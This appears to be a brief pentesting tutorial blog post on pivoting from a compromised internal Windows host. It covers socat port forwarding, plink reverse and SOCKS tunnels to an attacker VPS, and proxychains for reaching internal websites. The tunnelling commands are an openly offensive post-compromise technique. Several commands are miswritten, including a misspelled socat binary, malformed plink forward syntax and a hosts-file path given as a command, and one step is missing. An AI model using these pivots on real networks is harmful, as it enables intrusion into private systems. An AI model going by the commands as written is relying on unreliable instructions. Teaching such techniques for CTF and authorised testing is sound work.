1 minute read

Having a good knowledge on SSH tunnelling is an important tool in the arsenal for pentesting engagements and for playing networked Capture The Flag (CTF) events.

Problem Statement

We have gained an initial foothold on one of the internal system of an organization. Now, we want to run nmap scans on the internal networks to pivot laterally. The organization is also running an internally hosted website which is not accessible from outside. How do we expose the internal ports/traffic to the outside attacker machine so that we can run our tools and gain access to resources which are not exposed to the outside world?

Cyber Range Setup

The setup of the cyber range is given in figure below:

Deployment Architecture of Application

Actions at Victim Machine

Step 1:

As we already have an initial foothold on the victim machine, we will start the socate.exe. This program will forward the traffic to its local port:

socate.exe TCP-LISTEN:8080,fork,reuseaddr TCP:<target-server-ip>:443

Once the traffic has been forwarded to a specific port, in our case 8080, we can verify the same through netstat command:

# Now check if the port has been forwarded
netstat -ano // check connection

Step 3:

We will redirect the traffic of the victim PC to the Virtual Private Server (VPS) through SSH tunnel, using plink.exe for windows.

# Connect with VPS
plink.exe -l <username> -pw <password> -R 8080: <vps ip>

Actions at VPS Machine

# To check with curl
/etc/hosts <domain-name>

Forward Traffic to Kali Machine from VPS

# On Kali Machine
ssh -g -L 8080:localhost:8080 -f -N <username>@<vps ip> // this use when want to open localhost

Now open the browser and enter


Configure SOCKS5 proxy

Actions at victim machine

plink.exe -l <username> -pw <password> -D 8080: <vps ip>

Actions at VPS

Install proxychains

$ yum install proxychains
$ nano /etc/proxychain.conf
socks5 <vps-public-ip> 8080

Check on terminal

$ proxychains curl www.myweb.com

On Kali Machine

Do settings in the browser, if we want to open websites in browser

In case you want to use terminal for traffic and not browser, perform following steps

$ yum install proxychains

# nano /etc/proxychain.conf
socks5 <vps-public-ip> 8080

Check on terminal

$ proxychains curl www.myweb.com


  • https://pswalia2u.medium.com/ssh-tunneling-port-forwarding-pivoting-socks-proxy-85fb7129912d
